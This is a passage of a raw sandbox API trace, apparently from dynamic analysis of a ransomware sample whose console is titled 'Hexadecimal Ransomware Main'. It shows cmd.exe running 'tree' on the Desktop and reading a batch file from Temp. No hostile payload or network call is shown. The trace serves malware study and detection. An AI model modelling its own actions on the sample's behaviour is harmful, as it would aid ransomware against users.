(HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x368) returned 0x1dc256be260 [0106.320] GetProcessHeap () returned 0x1dc256b0000 [0106.320] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256be260, Size=0x1be) returned 0x1dc256be260 [0106.320] GetProcessHeap () returned 0x1dc256b0000 [0106.320] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256be260) returned 0x1be [0106.320] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0106.320] GetProcessHeap () returned 0x1dc256b0000 [0106.320] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xe8) returned 0x1dc256bcf80 [0106.320] GetProcessHeap () returned 0x1dc256b0000 [0106.320] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256bcf80, Size=0x7e) returned 0x1dc256bcf80 [0106.320] GetProcessHeap () returned 0x1dc256b0000 [0106.320] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256bcf80) returned 0x7e [0106.320] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0106.320] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\tree.*", fInfoLevelId=0x1, lpFindFileData=0x407419ea30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419ea30) returned 0xffffffffffffffff [0106.321] GetLastError () returned 0x2 [0106.321] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0106.321] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\tree.*", fInfoLevelId=0x1, lpFindFileData=0x407419ea30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419ea30) returned 0xffffffffffffffff [0106.321] GetLastError () returned 0x2 [0106.321] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0106.321] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\tree.*", fInfoLevelId=0x1, lpFindFileData=0x407419ea30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419ea30) returned 0x1dc256bf020 [0106.322] FindClose (in: hFindFile=0x1dc256bf020 | out: hFindFile=0x1dc256bf020) returned 1 [0106.322] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\tree.COM", fInfoLevelId=0x1, lpFindFileData=0x407419ea30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419ea30) returned 0x1dc256bef60 [0106.322] FindClose (in: hFindFile=0x1dc256bef60 | out: hFindFile=0x1dc256bef60) returned 1 [0106.322] _wcsicmp (_String1=".COM", _String2=".BAT") returned 1 [0106.322] _wcsicmp (_String1=".COM", _String2=".CMD") returned 2 [0106.322] ??_V@YAXPEAX@Z () returned 0x1 [0106.322] GetConsoleTitleW (in: lpConsoleTitle=0x407419eca0, nSize=0x104 | out: lpConsoleTitle="Administrator: Hexadecimal Ransomware Main") returned 0x2c [0106.370] malloc (_Size=0xffce) returned 0x1dc257f0140 [0106.370] ??_V@YAXPEAX@Z () returned 0x1dc257f0140 [0106.370] malloc (_Size=0xffce) returned 0x1dc25800120 [0106.370] ??_V@YAXPEAX@Z () returned 0x1dc25800120 [0106.370] _wcsicmp (_String1="tree", _String2="DIR") returned 16 [0106.370] _wcsicmp (_String1="tree", _String2="ERASE") returned 15 [0106.370] _wcsicmp (_String1="tree", _String2="DEL") returned 16 [0106.371] _wcsicmp (_String1="tree", _String2="TYPE") returned -7 [0106.371] _wcsicmp (_String1="tree", _String2="COPY") returned 17 [0106.371] _wcsicmp (_String1="tree", _String2="CD") returned 17 [0106.371] _wcsicmp (_String1="tree", _String2="CHDIR") returned 17 [0106.371] _wcsicmp (_String1="tree", _String2="RENAME") returned 2 [0106.371] _wcsicmp (_String1="tree", _String2="REN") returned 2 [0106.371] _wcsicmp (_String1="tree", _String2="ECHO") returned 15 [0106.371] _wcsicmp (_String1="tree", _String2="SET") returned 1 [0106.371] _wcsicmp (_String1="tree", _String2="PAUSE") returned 4 [0106.371] _wcsicmp (_String1="tree", _String2="DATE") returned 16 [0106.371] _wcsicmp (_String1="tree", _String2="TIME") returned 9 [0106.371] _wcsicmp (_String1="tree", _String2="PROMPT") returned 4 [0106.371] _wcsicmp (_String1="tree", _String2="MD") returned 7 [0106.371] _wcsicmp (_String1="tree", _String2="MKDIR") returned 7 [0106.371] _wcsicmp (_String1="tree", _String2="RD") returned 2 [0106.371] _wcsicmp (_String1="tree", _String2="RMDIR") returned 2 [0106.371] _wcsicmp (_String1="tree", _String2="PATH") returned 4 [0106.371] _wcsicmp (_String1="tree", _String2="GOTO") returned 13 [0106.371] _wcsicmp (_String1="tree", _String2="SHIFT") returned 1 [0106.371] _wcsicmp (_String1="tree", _String2="CLS") returned 17 [0106.371] _wcsicmp (_String1="tree", _String2="CALL") returned 17 [0106.371] _wcsicmp (_String1="tree", _String2="VERIFY") returned -2 [0106.371] _wcsicmp (_String1="tree", _String2="VER") returned -2 [0106.371] _wcsicmp (_String1="tree", _String2="VOL") returned -2 [0106.371] _wcsicmp (_String1="tree", _String2="EXIT") returned 15 [0106.371] _wcsicmp (_String1="tree", _String2="SETLOCAL") returned 1 [0106.371] _wcsicmp (_String1="tree", _String2="ENDLOCAL") returned 15 [0106.372] _wcsicmp (_String1="tree", _String2="TITLE") returned 9 [0106.372] _wcsicmp (_String1="tree", _String2="START") returned 1 [0106.372] _wcsicmp (_String1="tree", _String2="DPATH") returned 16 [0106.372] _wcsicmp (_String1="tree", _String2="KEYS") returned 9 [0106.372] _wcsicmp (_String1="tree", _String2="MOVE") returned 7 [0106.372] _wcsicmp (_String1="tree", _String2="PUSHD") returned 4 [0106.372] _wcsicmp (_String1="tree", _String2="POPD") returned 4 [0106.372] _wcsicmp (_String1="tree", _String2="ASSOC") returned 19 [0106.372] _wcsicmp (_String1="tree", _String2="FTYPE") returned 14 [0106.372] _wcsicmp (_String1="tree", _String2="BREAK") returned 18 [0106.372] _wcsicmp (_String1="tree", _String2="COLOR") returned 17 [0106.372] _wcsicmp (_String1="tree", _String2="MKLINK") returned 7 [0106.372] _wcsicmp (_String1="tree", _String2="DIR") returned 16 [0106.372] _wcsicmp (_String1="tree", _String2="ERASE") returned 15 [0106.372] _wcsicmp (_String1="tree", _String2="DEL") returned 16 [0106.372] _wcsicmp (_String1="tree", _String2="TYPE") returned -7 [0106.372] _wcsicmp (_String1="tree", _String2="COPY") returned 17 [0106.372] _wcsicmp (_String1="tree", _String2="CD") returned 17 [0106.372] _wcsicmp (_String1="tree", _String2="CHDIR") returned 17 [0106.372] _wcsicmp (_String1="tree", _String2="RENAME") returned 2 [0106.372] _wcsicmp (_String1="tree", _String2="REN") returned 2 [0106.372] _wcsicmp (_String1="tree", _String2="ECHO") returned 15 [0106.372] _wcsicmp (_String1="tree", _String2="SET") returned 1 [0106.372] _wcsicmp (_String1="tree", _String2="PAUSE") returned 4 [0106.372] _wcsicmp (_String1="tree", _String2="DATE") returned 16 [0106.373] _wcsicmp (_String1="tree", _String2="TIME") returned 9 [0106.373] _wcsicmp (_String1="tree", _String2="PROMPT") returned 4 [0106.373] _wcsicmp (_String1="tree", _String2="MD") returned 7 [0106.373] _wcsicmp (_String1="tree", _String2="MKDIR") returned 7 [0106.373] _wcsicmp (_String1="tree", _String2="RD") returned 2 [0106.373] _wcsicmp (_String1="tree", _String2="RMDIR") returned 2 [0106.373] _wcsicmp (_String1="tree", _String2="PATH") returned 4 [0106.373] _wcsicmp (_String1="tree", _String2="GOTO") returned 13 [0106.373] _wcsicmp (_String1="tree", _String2="SHIFT") returned 1 [0106.373] _wcsicmp (_String1="tree", _String2="CLS") returned 17 [0106.373] _wcsicmp (_String1="tree", _String2="CALL") returned 17 [0106.373] _wcsicmp (_String1="tree", _String2="VERIFY") returned -2 [0106.373] _wcsicmp (_String1="tree", _String2="VER") returned -2 [0106.373] _wcsicmp (_String1="tree", _String2="VOL") returned -2 [0106.373] _wcsicmp (_String1="tree", _String2="EXIT") returned 15 [0106.373] _wcsicmp (_String1="tree", _String2="SETLOCAL") returned 1 [0106.373] _wcsicmp (_String1="tree", _String2="ENDLOCAL") returned 15 [0106.373] _wcsicmp (_String1="tree", _String2="TITLE") returned 9 [0106.373] _wcsicmp (_String1="tree", _String2="START") returned 1 [0106.373] _wcsicmp (_String1="tree", _String2="DPATH") returned 16 [0106.373] _wcsicmp (_String1="tree", _String2="KEYS") returned 9 [0106.373] _wcsicmp (_String1="tree", _String2="MOVE") returned 7 [0106.373] _wcsicmp (_String1="tree", _String2="PUSHD") returned 4 [0106.373] _wcsicmp (_String1="tree", _String2="POPD") returned 4 [0106.373] _wcsicmp (_String1="tree", _String2="ASSOC") returned 19 [0106.373] _wcsicmp (_String1="tree", _String2="FTYPE") returned 14 [0106.374] _wcsicmp (_String1="tree", _String2="BREAK") returned 18 [0106.374] _wcsicmp (_String1="tree", _String2="COLOR") returned 17 [0106.374] _wcsicmp (_String1="tree", _String2="MKLINK") returned 7 [0106.374] _wcsicmp (_String1="tree", _String2="FOR") returned 14 [0106.374] _wcsicmp (_String1="tree", _String2="IF") returned 11 [0106.374] _wcsicmp (_String1="tree", _String2="REM") returned 2 [0106.374] ??_V@YAXPEAX@Z () returned 0x1 [0106.374] GetProcessHeap () returned 0x1dc256b0000 [0106.374] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xffde) returned 0x1dc256d8720 [0106.374] GetProcessHeap () returned 0x1dc256b0000 [0106.374] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1a) returned 0x1dc256bbb60 [0106.375] _wcsnicmp (_String1="tree", _String2="cmd ", _MaxCount=0x4) returned 17 [0106.375] malloc (_Size=0xffce) returned 0x1dc25800120 [0106.375] ??_V@YAXPEAX@Z () returned 0x1dc25800120 [0106.376] GetProcessHeap () returned 0x1dc256b0000 [0106.376] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1ffac) returned 0x1dc256e8710 [0106.377] SetErrorMode (uMode=0x0) returned 0x0 [0106.377] SetErrorMode (uMode=0x1) returned 0x0 [0106.377] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x1dc256e8720, lpFilePart=0x407419e520 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x407419e520*="Desktop") returned 0x17 [0106.377] SetErrorMode (uMode=0x0) returned 0x1 [0106.377] GetProcessHeap () returned 0x1dc256b0000 [0106.377] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256e8710, Size=0x4a) returned 0x1dc256e8710 [0106.377] GetProcessHeap () returned 0x1dc256b0000 [0106.377] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256e8710) returned 0x4a [0106.377] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0106.377] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0106.377] GetProcessHeap () returned 0x1dc256b0000 [0106.377] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1bc) returned 0x1dc256bd2a0 [0106.377] GetProcessHeap () returned 0x1dc256b0000 [0106.377] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x368) returned 0x1dc256be430 [0106.377] GetProcessHeap () returned 0x1dc256b0000 [0106.377] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256be430, Size=0x1be) returned 0x1dc256be430 [0106.377] GetProcessHeap () returned 0x1dc256b0000 [0106.378] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256be430) returned 0x1be [0106.378] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0106.378] GetProcessHeap () returned 0x1dc256b0000 [0106.378] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xe8) returned 0x1dc256be600 [0106.378] GetProcessHeap () returned 0x1dc256b0000 [0106.378] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256be600, Size=0x7e) returned 0x1dc256be600 [0106.378] GetProcessHeap () returned 0x1dc256b0000 [0106.378] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256be600) returned 0x7e [0106.378] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0106.378] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\tree.*", fInfoLevelId=0x1, lpFindFileData=0x407419e290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419e290) returned 0xffffffffffffffff [0106.378] GetLastError () returned 0x2 [0106.378] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0106.379] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\tree.*", fInfoLevelId=0x1, lpFindFileData=0x407419e290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419e290) returned 0xffffffffffffffff [0106.379] GetLastError () returned 0x2 [0106.379] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0106.379] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\tree.*", fInfoLevelId=0x1, lpFindFileData=0x407419e290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419e290) returned 0x1dc256bef60 [0106.379] FindClose (in: hFindFile=0x1dc256bef60 | out: hFindFile=0x1dc256bef60) returned 1 [0106.379] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\tree.COM", fInfoLevelId=0x1, lpFindFileData=0x407419e290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419e290) returned 0x1dc256be9c0 [0106.379] FindClose (in: hFindFile=0x1dc256be9c0 | out: hFindFile=0x1dc256be9c0) returned 1 [0106.380] _wcsicmp (_String1=".COM", _String2=".BAT") returned 1 [0106.380] _wcsicmp (_String1=".COM", _String2=".CMD") returned 2 [0106.380] ??_V@YAXPEAX@Z () returned 0x1 [0106.380] GetConsoleTitleW (in: lpConsoleTitle=0x407419e810, nSize=0x104 | out: lpConsoleTitle="Administrator: Hexadecimal Ransomware Main") returned 0x2c [0106.383] InitializeProcThreadAttributeList (in: lpAttributeList=0x407419e730, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x407419e620 | out: lpAttributeList=0x407419e730, lpSize=0x407419e620) returned 1 [0106.383] UpdateProcThreadAttribute (in: lpAttributeList=0x407419e730, dwFlags=0x0, Attribute=0x60001, lpValue=0x407419e60c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x407419e730, lpPreviousValue=0x0) returned 1 [0106.383] GetStartupInfoW (in: lpStartupInfo=0x407419e6c0 | out: lpStartupInfo=0x407419e6c0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0106.383] GetProcessHeap () returned 0x1dc256b0000 [0106.383] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x20) returned 0x1dc256b1640 [0106.383] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0106.383] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0106.383] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0106.383] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0106.383] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0106.383] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0106.383] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0106.383] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0106.384] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0106.384] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0106.384] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0106.384] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0106.384] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0106.384] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0106.384] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0106.384] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0106.384] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0106.384] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0106.384] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0106.384] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0106.384] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0106.384] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0106.384] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0106.384] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0106.384] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0106.384] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0106.384] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0106.384] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0106.385] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0106.385] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0106.385] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0106.385] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0106.385] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0106.385] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0106.385] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0106.385] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0106.385] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0106.385] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0106.385] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0106.385] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0106.385] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0106.385] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0106.385] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0106.385] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0106.385] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0106.385] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0106.385] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0106.385] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0106.385] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0106.385] GetProcessHeap () returned 0x1dc256b0000 [0106.385] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256b1640) returned 1 [0106.385] GetProcessHeap () returned 0x1dc256b0000 [0106.385] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x12) returned 0x1dc256b9260 [0106.386] lstrcmpW (lpString1="\\tree.com", lpString2="\\XCOPY.EXE") returned -1 [0106.386] _get_osfhandle (_FileHandle=1) returned 0x50 [0106.386] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0106.392] _get_osfhandle (_FileHandle=0) returned 0x4c [0106.392] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0106.396] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\tree.com", lpCommandLine="tree", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x407419e650*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tree", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x407419e628 | out: lpCommandLine="tree", lpProcessInformation=0x407419e628*(hProcess=0x9c, hThread=0xa0, dwProcessId=0xfac, dwThreadId=0xfc4)) returned 1 [0106.435] CloseHandle (hObject=0xa0) returned 1 [0106.435] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0106.435] GetProcessHeap () returned 0x1dc256b0000 [0106.435] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bf990) returned 1 [0106.435] GetEnvironmentStringsW () returned 0x1dc256b5e60* [0106.435] GetProcessHeap () returned 0x1dc256b0000 [0106.435] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xec2) returned 0x1dc256bf990 [0106.435] FreeEnvironmentStringsA (penv="=") returned 1 [0106.435] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0106.680] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x407419e5a8 | out: lpExitCode=0x407419e5a8*=0x0) returned 1 [0106.680] CloseHandle (hObject=0x9c) returned 1 [0106.681] _vsnwprintf (in: _Buffer=0x407419e778, _BufferCount=0x13, _Format="%08X", _ArgList=0x407419e5b8 | out: _Buffer="00000000") returned 8 [0106.681] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0106.681] GetProcessHeap () returned 0x1dc256b0000 [0106.681] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bf990) returned 1 [0106.681] GetEnvironmentStringsW () returned 0x1dc256b5e60* [0106.681] GetProcessHeap () returned 0x1dc256b0000 [0106.681] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xec2) returned 0x1dc256bf990 [0106.681] FreeEnvironmentStringsA (penv="=") returned 1 [0106.681] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0106.681] GetProcessHeap () returned 0x1dc256b0000 [0106.681] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bf990) returned 1 [0106.681] GetEnvironmentStringsW () returned 0x1dc256b5e60* [0106.681] GetProcessHeap () returned 0x1dc256b0000 [0106.681] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xec2) returned 0x1dc256bf990 [0106.681] FreeEnvironmentStringsA (penv="=") returned 1 [0106.681] GetProcessHeap () returned 0x1dc256b0000 [0106.681] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256b9260) returned 1 [0106.681] DeleteProcThreadAttributeList (in: lpAttributeList=0x407419e730 | out: lpAttributeList=0x407419e730) [0106.681] ??_V@YAXPEAX@Z () returned 0x1 [0106.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0106.683] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0106.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0106.706] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x7ff67b90fc08 | out: lpMode=0x7ff67b90fc08) returned 1 [0106.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0106.789] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x7) returned 1 [0106.802] _get_osfhandle (_FileHandle=0) returned 0x4c [0106.802] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x7ff67b90fc0c | out: lpMode=0x7ff67b90fc0c) returned 1 [0106.805] _get_osfhandle (_FileHandle=0) returned 0x4c [0106.805] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1e7) returned 1 [0106.862] SetConsoleInputExeNameW () returned 0x1 [0106.862] GetConsoleOutputCP () returned 0x1b5 [0106.866] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff67b90fbb0 | out: lpCPInfo=0x7ff67b90fbb0) returned 1 [0106.866] SetThreadUILanguage (LangId=0x0) returned 0x409 [0106.869] ??_V@YAXPEAX@Z () returned 0x1 [0106.871] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\9b7b.tmp\\9bba.tmp\\9bcb.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x407419eef8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0106.871] _open_osfhandle (_OSFileHandle=0x9c, _Flags=8) returned 3 [0106.871] _get_osfhandle (_FileHandle=3) returned 0x9c [0106.871] SetFilePointer (in: hFile=0x9c, lDistanceToMove=81, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x51 [0106.871] GetProcessHeap () returned 0x1dc256b0000 [0106.871] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256be600) returned 1 [0106.871] GetProcessHeap () returned 0x1dc256b0000 [0106.871] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256be430) returned 1 [0106.871] GetProcessHeap () returned 0x1dc256b0000 [0106.871] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bd2a0) returned 1 [0106.871] GetProcessHeap () returned 0x1dc256b0000 [0106.871] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256e8710) returned 1 [0106.872] GetProcessHeap () returned 0x1dc256b0000 [0106.872] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bbb60) returned 1 [0106.872] GetProcessHeap () returned 0x1dc256b0000 [0106.872] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256d8720) returned 1 [0106.872] GetProcessHeap () returned 0x1dc256b0000 [0106.872] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bcf80) returned 1 [0106.872] GetProcessHeap () returned 0x1dc256b0000 [0106.872] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256be260) returned 1 [0106.872] GetProcessHeap () returned 0x1dc256b0000 [0106.872] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bd640) returned 1 [0106.872] GetProcessHeap () returned 0x1dc256b0000 [0106.872] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256d86c0) returned 1 [0106.874] 